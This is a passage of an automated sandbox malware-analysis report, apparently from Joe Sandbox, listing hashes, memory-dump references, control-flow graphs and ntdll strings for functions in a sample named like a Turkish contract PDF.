                              • Instruction ID: f0b02251e73aef379acb1bcaa3d4bbb33feb9f194f416ea064b53c27f798a5ca
                              • Opcode Fuzzy Hash: 01794141996f99769371372e709332901346a697a8b340274678f19021a2ff03
                              • Instruction Fuzzy Hash: DB9002216014004285407268AA5490640056BE1211751C526A4A98511DD669986966A5
                              Function 32BD2EC0 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ec3807e22403d275453b394abab35611fbf27be93096bc8f090d977ead0595d0
                              • Instruction ID: 19efaca322b6b9f4898f93c921ebcd77c16e45f42eeb52b31370afef45a88250
                              • Opcode Fuzzy Hash: ec3807e22403d275453b394abab35611fbf27be93096bc8f090d977ead0595d0
                              • Instruction Fuzzy Hash: 0190023120180402D50062586A18747000547D0302F51C416A9264516ED775D8957571
                              Function 32BD2E00 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1162475b6b51d571fa4ad8cb164f95a1d9cf9ba9f3f8fe2c0a986b2474e70bbd
                              • Instruction ID: 6c67aaed41a2d8e56a86203648a9d0b16920a6c110e18b2ed48126bd1d0a526f
                              • Opcode Fuzzy Hash: 1162475b6b51d571fa4ad8cb164f95a1d9cf9ba9f3f8fe2c0a986b2474e70bbd
                              • Instruction Fuzzy Hash: 4F90026120180403D54066586A14607000547D0302F51C416A6164516EDB399C557175
                              Function 32BD2E50 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8fa5f10ba963c15cdadef2917503cb4e640653bcc3dd67da969a00b9bcf5bbbc
                              • Instruction ID: 4d7ec855a817d87bb192af809fa20342601baa10caf2aef483811e80bd886725
                              • Opcode Fuzzy Hash: 8fa5f10ba963c15cdadef2917503cb4e640653bcc3dd67da969a00b9bcf5bbbc
                              • Instruction Fuzzy Hash: 9390026134140442D50062586624B06000587E1301F51C41AE5164515DD729DC567166
                              Function 32BD2FB0 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 66539a9a24399459a903b086bcda7bf110e8a078b029081ee867bff1cd72edfb
                              • Instruction ID: 77fe2fff00dca033f2eec333547b206a8c58a0a05f5a19e1082a0206a098bc9d
                              • Opcode Fuzzy Hash: 66539a9a24399459a903b086bcda7bf110e8a078b029081ee867bff1cd72edfb
                              • Instruction Fuzzy Hash: A490022124140802D5407258A624707000687D0601F51C416A4124515DD726996976F1
                              Function 32BD2F30 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ba8973a1242c42eb13eb20c33ebcda6ab6f94e7d069bd7f95cc814ba778fb740
                              • Instruction ID: 30ba4c11c51aef3138eafe1b0914940f9863f1d690ee28f0dbf209ce75f65aad
                              • Opcode Fuzzy Hash: ba8973a1242c42eb13eb20c33ebcda6ab6f94e7d069bd7f95cc814ba778fb740
                              • Instruction Fuzzy Hash: FD90022120184442D54063586A14B0F410547E1202F91C41EA8256515CDA2598596761
                              Function 32BD2F00 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bc9c56e92f1b3a3748ed70b8cd44283c57b511670ec6102b6809d285e6e7391b
                              • Instruction ID: 840cfab033361b635aaa4e53b9de4697784c1b3e94c9ddd2e558d24a6e6c9776
                              • Opcode Fuzzy Hash: bc9c56e92f1b3a3748ed70b8cd44283c57b511670ec6102b6809d285e6e7391b
                              • Instruction Fuzzy Hash: FB900221211C0042D60066686E24B07000547D0303F51C51AA4254515CDA2598656561
                              Function 32BD3C90 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6fcf9eb92a9589d1d5a136e379c1606d204dca24af613d326684da155b84a01
                              • Instruction ID: c8934a0ecf42a6b1ef8bcdb6266678a26d913469b130d2ef9a9bca663c3b30c5
                              • Opcode Fuzzy Hash: f6fcf9eb92a9589d1d5a136e379c1606d204dca24af613d326684da155b84a01
                              • Instruction Fuzzy Hash: 2C90023520140402D91062587A14646004647D0301F51D816A4524519DD76498A5B161
                              Function 32BD2CF0 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 296eb3cea5bbef4185f4d46997c0bc592cd13cf2dc561727d9a535bea6bf1fed
                              • Instruction ID: d8eade5684d17a2066c5920a7478f5bad5f718a841e4eed882a252753907f8bf
                              • Opcode Fuzzy Hash: 296eb3cea5bbef4185f4d46997c0bc592cd13cf2dc561727d9a535bea6bf1fed
                              • Instruction Fuzzy Hash: 71900221242441529945B2586614507400657E0241791C417A5514911CD636A85AE661
                              Function 32BD2CD0 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f5524f18b963de78cc686aff491da0e6e1ce42ef8d4411c87e93cb7cb2586529
                              • Instruction ID: 8d0d463b166cfa9c7c40b371b870501b53f4c2644b925b38d290f877cc35309f
                              • Opcode Fuzzy Hash: f5524f18b963de78cc686aff491da0e6e1ce42ef8d4411c87e93cb7cb2586529
                              • Instruction Fuzzy Hash: D690023124140402D54172586614606000957D0241F91C417A4524515ED7659A5ABAA1
                              Function 32BD3C30 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 985129817de48d1d988c2dfe2fdd35df7aa63c088c09b91466b7e8dd6663beaf
                              • Instruction ID: 7f9a2850410360a966abda969b2f14b9066211fdac8b430a5b98e43ea3f5f5bc
                              • Opcode Fuzzy Hash: 985129817de48d1d988c2dfe2fdd35df7aa63c088c09b91466b7e8dd6663beaf
                              • Instruction Fuzzy Hash: 5E90023120240142D94063587A14A4E410547E1302B91D81AA4115515CDA2498656261
                              Function 32BD2C30 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ed1322d3557cd67cd944dc2dc2e48bcb459b070d4f0226092e1c107877648d77
                              • Instruction ID: cbcceb562dc7907f5df8f6a28cfdf156e8feaf2ac5cda3209d1dfa73fd1ed3e2
                              • Opcode Fuzzy Hash: ed1322d3557cd67cd944dc2dc2e48bcb459b070d4f0226092e1c107877648d77
                              • Instruction Fuzzy Hash: 1D90022921340002D5807258761860A000547D1202F91D81AA4115519CDA25986D6361
                              Function 32BD2C20 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bd7b4d1761c59781b61cd922bc5777faa282617acfaba2507858eab59d6abc9
                              • Instruction ID: a8aeb5d1a35cf5171b838eb9feccfc4c71d7f18a82524e01d1fe1b3faa3026ee
                              • Opcode Fuzzy Hash: 6bd7b4d1761c59781b61cd922bc5777faa282617acfaba2507858eab59d6abc9
                              • Instruction Fuzzy Hash: F090022120544442D50066587618A06000547D0205F51D416A5164556DD7359855B171
                              Function 32BD2C10 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1f2597dcc57d63a3e8656351034fc004d93a088ee15c26ff4a66f2090083404c
                              • Instruction ID: f4801fb388213e475c3b635d9c9ad232da02e3adc4aaecbd318349447b4d9935
                              • Opcode Fuzzy Hash: 1f2597dcc57d63a3e8656351034fc004d93a088ee15c26ff4a66f2090083404c
                              • Instruction Fuzzy Hash: 6690023120140403D50062587718707000547D0201F51D816A4524519DE76698557161
                              Function 32BD2C50 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8b3a374cec0bdd50facbab5c942c55a649da05cd73c1fbb558c6ac2525ac389f
                              • Instruction ID: 674959e736494481fda2f975cca454a70d7ca64b96be1afae27056ccfaff2fae
                              • Opcode Fuzzy Hash: 8b3a374cec0bdd50facbab5c942c55a649da05cd73c1fbb558c6ac2525ac389f
                              • Instruction Fuzzy Hash: B990022130140003D54072587628606400597E1301F51D416E4514515CEA25985A6262
                              Function 32BD2DA0 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b18c68f61ad17f5f56562e88f06d67b8725aab3b56d07983e0586f2efdbaf96a
                              • Instruction ID: e4319c682f765f4ceaaedd759363ac80468b1c68b95ac6d4bbe7a226960714f2
                              • Opcode Fuzzy Hash: b18c68f61ad17f5f56562e88f06d67b8725aab3b56d07983e0586f2efdbaf96a
                              • Instruction Fuzzy Hash: 7990022160140502D50172586614616000A47D0241F91C427A5124516EDB359996B171
                              Function 32BD2DC0 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 778cff01af0c0e79e17d14669ffbd8381d50cbea997ab423d3d3b12bd0d48184
                              • Instruction ID: 3c590cd5f432441c3f6b0df229258d8be72f5c6816e489997164a577b0a9f076
                              • Opcode Fuzzy Hash: 778cff01af0c0e79e17d14669ffbd8381d50cbea997ab423d3d3b12bd0d48184
                              • Instruction Fuzzy Hash: 1790027120140402D54072586614746000547D0301F51C416A9164515ED7699DD976A5
                              Function 32BD2D50 Relevance: .0, Instructions: 4COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d16bf8b2de88102c9f10daa2401e258ca187403604439911acd548632b631ac
                              • Instruction ID: 3c16873583f0c5690b804d4edf113728c15f1eaec31ab0a6b69dce153f91e9c3
                              • Opcode Fuzzy Hash: 7d16bf8b2de88102c9f10daa2401e258ca187403604439911acd548632b631ac
                              • Instruction Fuzzy Hash: 1790022130140402D50262586624606000987D1345F91C417E5524516DD7359957B172
                              Function 32BD2B20 Relevance: .0, Instructions: 1COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                              • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                              • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                              • Instruction Fuzzy Hash:
                              Function 32C6A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 809 32c6a1f0-32c6a269 call 32ba2330 * 2 RtlDebugPrintTimes 815 32c6a41f-32c6a444 call 32ba24d0 * 2 call 32bd4b50 809->815 816 32c6a26f-32c6a27a 809->816 818 32c6a2a4 816->818 819 32c6a27c-32c6a289 816->819 823 32c6a2a8-32c6a2b4 818->823 821 32c6a28f-32c6a295 819->821 822 32c6a28b-32c6a28d 819->822 825 32c6a373-32c6a375 821->825 826 32c6a29b-32c6a2a2 821->826 822->821 827 32c6a2c1-32c6a2c3 823->827 829 32c6a39f-32c6a3a1 825->829 826->823 830 32c6a2b6-32c6a2bc 827->830 831 32c6a2c5-32c6a2c7 827->831 832 32c6a3a7-32c6a3b4 829->832 833 32c6a2d5-32c6a2fd RtlDebugPrintTimes 829->833 835 32c6a2be 830->835 836 32c6a2cc-32c6a2d0 830->836 831->829 837 32c6a3b6-32c6a3c3 832->837 838 32c6a3da-32c6a3e6 832->838 833->815 845 32c6a303-32c6a320 RtlDebugPrintTimes 833->845 835->827 840 32c6a3ec-32c6a3ee 836->840 841 32c6a3c5-32c6a3c9 837->841 842 32c6a3cb-32c6a3d1 837->842 843 32c6a3fb-32c6a3fd 838->843 840->829 841->842 846 32c6a3d7 842->846 847 32c6a4eb-32c6a4ed 842->847 848 32c6a3f0-32c6a3f6 843->848 849 32c6a3ff-32c6a401 843->849 845->815 857 32c6a326-32c6a34c RtlDebugPrintTimes 845->857 846->838 850 32c6a403-32c6a409 847->850 851 32c6a447-32c6a44b 848->851 852 32c6a3f8 848->852 849->850 855 32c6a450-32c6a474 RtlDebugPrintTimes 850->855 856 32c6a40b-32c6a41d RtlDebugPrintTimes 850->856 854 32c6a51f-32c6a521 851->854 852->843 855->815 861 32c6a476-32c6a493 RtlDebugPrintTimes 855->861 856->815 857->815 862 32c6a352-32c6a354 857->862 861->815 869 32c6a495-32c6a4c4 RtlDebugPrintTimes 861->869 863 32c6a356-32c6a363 862->863 864 32c6a377-32c6a38a 862->864 866 32c6a365-32c6a369 863->866 867 32c6a36b-32c6a371 863->867 868 32c6a397-32c6a399 864->868 866->867 867->825 867->864 870 32c6a38c-32c6a392 868->870 871 32c6a39b-32c6a39d 868->871 869->815 875 32c6a4ca-32c6a4cc 869->875 873 32c6a394 870->873 874 32c6a3e8-32c6a3ea 870->874 871->829 873->868 874->840 876 32c6a4f2-32c6a505 875->876 877 32c6a4ce-32c6a4db 875->877 880 32c6a512-32c6a514 876->880 878 32c6a4e3-32c6a4e9 877->878 879 32c6a4dd-32c6a4e1 877->879 878->847 878->876 879->878 881 32c6a516 880->881 882 32c6a507-32c6a50d 880->882 881->849 883 32c6a50f 882->883 884 32c6a51b-32c6a51d 882->884 883->880 884->854
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: HEAP:
                              • API String ID: 3446177414-2466845122
                              • Opcode ID: 4e2d4de3aba2b1b7ffcee543acbe2779db348199b111d55cf75c9d89c99cec9e
                              • Instruction ID: 3eaf52327e1a9d9ecdb0ceb15bb57eb5aeb32d37377b00eee091ac34b054fa88
                              • Opcode Fuzzy Hash: 4e2d4de3aba2b1b7ffcee543acbe2779db348199b111d55cf75c9d89c99cec9e
                              • Instruction Fuzzy Hash: 96A169757083118FD704CE28C894A3AB7E5FF88758F194969EA4ADB311EB70EC46CB91
                              Function 32BC7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 885 32bc7550-32bc7571 886 32bc75ab-32bc75b9 call 32bd4b50 885->886 887 32bc7573-32bc758f call 32b9e580 885->887 892 32c04443 887->892 893 32bc7595-32bc75a2 887->893 896 32c0444a-32c04450 892->896 894 32bc75ba-32bc75c9 call 32bc7738 893->894 895 32bc75a4 893->895 901 32bc75cb-32bc75e1 call 32bc76ed 894->901 902 32bc7621-32bc762a 894->902 895->886 898 32c04456-32c044c3 call 32c1ef10 call 32bd8f40 RtlDebugPrintTimes BaseQueryModuleData 896->898 899 32bc75e7-32bc75f0 call 32bc7648 896->899 898->899 917 32c044c9-32c044d1 898->917 899->902 910 32bc75f2 899->910 901->896 901->899 908 32bc75f8-32bc7601 902->908 912 32bc762c-32bc762e 908->912 913 32bc7603-32bc7612 call 32bc763b 908->913 910->908 914 32bc7614-32bc7616 912->914 913->914 919 32bc7618-32bc761a 914->919 920 32bc7630-32bc7639 914->920 917->899 921 32c044d7-32c044de 917->921 919->895 922 32bc761c 919->922 920->919 921->899 923 32c044e4-32c044ef 921->923 924 32c045c9-32c045db call 32bd2b70 922->924 926 32c045c4 call 32bd4c68 923->926 927 32c044f5-32c0452e call 32c1ef10 call 32bda9c0 923->927 924->895 926->924 934 32c04530-32c04541 call 32c1ef10 927->934 935 32c04546-32c04576 call 32c1ef10 927->935 934->902 935->899 940 32c0457c-32c0458a call 32bda690 935->940 943 32c04591-32c045ae call 32c1ef10 call 32c0cc1e 940->943 944 32c0458c-32c0458e 940->944 943->899 949 32c045b4-32c045bd 943->949 944->943 949->940 950 32c045bf 949->950 950->899
                              Strings
                              • Execute=1, xrefs: 32C0451E
                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32C04507
                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32C04460
                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32C04530
                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 32C04592
                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32C0454D
                              • ExecuteOptions, xrefs: 32C044AB
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                              • API String ID: 0-484625025
                              • Opcode ID: 399cdad1877e9156200e16b12af64127fb0e44f31ca9925bccd4c6150b1f1a00
                              • Instruction ID: 4cb6a63ef268c0e372e583cc88318eb81e3ba03e3c7c7b07e94f8d8d0a5f518b
                              • Opcode Fuzzy Hash: 399cdad1877e9156200e16b12af64127fb0e44f31ca9925bccd4c6150b1f1a00
                              • Instruction Fuzzy Hash: 7F51F6B5A00329ABEB149FA4DC95FEE73ACEF08744F4005A9E905A7181EB70DE45DF60
                              Function 32BAA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                              Download Yara Rule
                              Strings
                              • SsHd, xrefs: 32BAA304
                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32BF77E2
                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32BF7807
                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 32BF77DD, 32BF7802
                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32BF78F3
                              • Actx , xrefs: 32BF7819, 32BF7880
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
